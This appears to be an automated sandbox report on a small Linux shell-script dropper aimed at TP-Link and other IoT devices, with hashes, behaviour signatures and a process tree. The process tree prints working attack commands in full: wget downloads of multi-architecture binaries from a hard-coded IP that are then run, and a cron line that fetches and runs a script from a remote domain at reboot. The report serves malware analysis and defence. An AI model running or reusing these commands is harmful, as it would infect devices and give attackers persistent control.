Analysis
-
max time kernel
103s -
max time network
146s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
01-01-2025 16:13
Static task
static1
Behavioral task
behavioral1
Sample
l.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
l.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
l.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
l.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
l.sh
-
Size
240B
-
MD5
e2102b077fa0da3be5a5b07b22a34d20
-
SHA1
629a840f9cbd82d8126f2e6b26f4668af8757f10
-
SHA256
6f6de7f166f98d6391f52362327abeae69469b3dd8e09db11c11615a2c5cb31f
-
SHA512
3db852f800118e0a6343e3d121db6eeb851ae72856ec4e7b07edb665e151811b2b6435706795370550cdeaf8b9816b64d42e6c317a1b6c781660905876873fdf
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 759 chmod 763 chmod 769 chmod 795 chmod 820 chmod 822 sh 833 chmod 836 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/upnp 760 upnp /tmp/upnp 764 upnp /tmp/upnp 770 upnp /tmp/upnp 796 upnp /tmp/upnp 821 upnp /tmp/upnp 831 upnp /tmp/upnp 834 upnp /tmp/upnp 837 upnp -
Renames itself 1 IoCs
pid Process 821 upnp -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 139.84.165.176 Destination IP 217.160.70.42 Destination IP 81.169.136.222 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.xdRiHD crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself [kswapd0] 821 upnp -
description ioc Process File opened for reading /proc/720/stat killall File opened for reading /proc/726/stat killall File opened for reading /proc/4/stat killall File opened for reading /proc/69/stat killall File opened for reading /proc/72/stat killall File opened for reading /proc/221/stat killall File opened for reading /proc/853/status upnp File opened for reading /proc/858/status upnp File opened for reading /proc/6/stat killall File opened for reading /proc/11/stat killall File opened for reading /proc/75/stat killall File opened for reading /proc/371/stat killall File opened for reading /proc/420/stat killall File opened for reading /proc/841/status upnp File opened for reading /proc/857/cmdline upnp File opened for reading /proc/832/status upnp File opened for reading /proc/842/status upnp File opened for reading /proc/mounts upnp File opened for reading /proc/830/status upnp File opened for reading /proc/851/status upnp File opened for reading /proc/filesystems killall File opened for reading /proc/37/stat killall File opened for reading /proc/721/cmdline killall File opened for reading /proc/809/cmdline upnp File opened for reading /proc/12/stat killall File opened for reading /proc/327/stat killall File opened for reading /proc/852/status upnp File opened for reading /proc/18/stat killall File opened for reading /proc/164/stat killall File opened for reading /proc/326/stat killall File opened for reading /proc/833/status upnp File opened for reading /proc/666/stat killall File opened for reading /proc/836/status upnp File opened for reading /proc/77/stat killall File opened for reading /proc/147/stat killall File opened for reading /proc/854/status upnp File opened for reading /proc/857/status upnp File opened for reading /proc/19/stat killall File opened for reading /proc/76/stat killall File opened for reading /proc/236/stat killall File opened for reading /proc/114/stat killall File opened for reading /proc/filesystems crontab File opened for reading /proc/68/stat killall File opened for reading /proc/729/stat killall File opened for reading /proc/849/status upnp File opened for reading /proc/731/stat killall File opened for reading /proc/2/stat killall File opened for reading /proc/5/stat killall File opened for reading /proc/846/status upnp File opened for reading /proc/847/status upnp File opened for reading /proc/3/stat killall File opened for reading /proc/67/stat killall File opened for reading /proc/81/stat killall File opened for reading /proc/834/status upnp File opened for reading /proc/844/status upnp File opened for reading /proc/8/stat killall File opened for reading /proc/9/stat killall File opened for reading /proc/13/stat killall File opened for reading /proc/21/stat killall File opened for reading /proc/22/stat killall File opened for reading /proc/104/stat killall File opened for reading /proc/16/stat killall File opened for reading /proc/144/stat killall File opened for reading /proc/663/stat killall -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 799 wget 821 upnp -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/upnp l.sh
Processes
-
/tmp/l.sh/tmp/l.sh1⤵
- Writes file to tmp directory
PID:729 -
/usr/bin/killallkillall -9 dvrLocker2⤵
- Reads runtime system information
PID:730
-
-
/bin/rmrm -rf upnp2⤵PID:733
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm -O -2⤵PID:736
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/upnp./upnp tplink.arm2⤵
- Executes dropped EXE
PID:760
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm5 -O -2⤵PID:762
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/upnp./upnp tplink.arm52⤵
- Executes dropped EXE
PID:764
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm6 -O -2⤵PID:766
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/upnp./upnp tplink.arm62⤵
- Executes dropped EXE
PID:770
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm7 -O -2⤵PID:773
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/upnp./upnp tplink.arm72⤵
- Executes dropped EXE
PID:796
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mips -O -2⤵
- System Network Configuration Discovery
PID:799
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/upnp./upnp tplink.mips2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
- Reads runtime system information
- System Network Configuration Discovery
PID:821 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:822 -
/usr/bin/crontabcrontab -l4⤵PID:825
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:824
-
-
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mpsl -O -2⤵PID:829
-
-
/tmp/upnp./upnp tplink.mpsl2⤵
- Executes dropped EXE
PID:831
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/upnp./upnp tplink.ppc2⤵
- Executes dropped EXE
PID:834
-
-
/usr/bin/wgetwget http://103.188.82.218/t/x86 -O -2⤵PID:835
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/upnp./upnp tplink.x862⤵
- Executes dropped EXE
PID:837
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
77KB
MD5d09db60a70d5b53b5b53ad39476fd7e8
SHA173a75e5e8200f77d857a7256cc0979077e29241d
SHA25636b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04
-
Filesize
73KB
MD5f812a7b3a877f717eb6e54b843b41848
SHA121ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA2569a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732
-
Filesize
85KB
MD5d8b9115310ca0429f6ec2473696156a2
SHA15497d765ad0b6ad6ed2204338faecd9671f6a60c
SHA2567f089801a37f1d9a83a5103c8f9b1c6fc00f9ce699cb812cc23704aea8d46c8c
SHA512a3adc2f2a36bdf40bda9e592f03bf51c3a3e7954fbeb8e52d1517537c72efc7df2d22e8be0d1ac85b768aacb45bd77cabb0ced0885ac96c17252b8af63cdb664
-
Filesize
102KB
MD545c898246a8ffe0b7cc20fe25669da04
SHA15ae935186b80f6beb84926d57337d5c0b9e3e1fc
SHA2561b0846e58fbb6a0e72d25edb81ec94961c0c7048a4e6f26876660f5a26675c77
SHA512ca75fb8ae0aa7977132c2888ff226f712f4e66f542ab121bcffdc3b3a912b906870b55d6415dfc60c133574739a71c1e5177418dd275d208f43d6ffc09c14636
-
Filesize
99KB
MD5559f129d380ad1cfb60792c6b2dc3d32
SHA13997a0fc0bd5958783f1751364ec407c5b170adc
SHA256fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA5129f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112
-
Filesize
100KB
MD54ad582d49f505bfab7de84881998685b
SHA15f09f4baed114b594729ded91e2c4d263f0e2754
SHA256b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA5126f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
-
Filesize
306B
MD502ffc990d17c4101ac83c8ab0370201e
SHA1bbd9f1aa7f3f0f78b98396964b266c7343ac6cfc
SHA256266e73b4bcfc7590c06d1aba6288d933fcdf98ff357299942f0244d586b7a1b6
SHA512d004ae9d28dbe9ba8b3e15fe3b824422be63c61a4f85dd6e66013e782a64b9d1df22a133b407a2849cd78374050d821c8b6b0be9431821018007bddb64a7f96c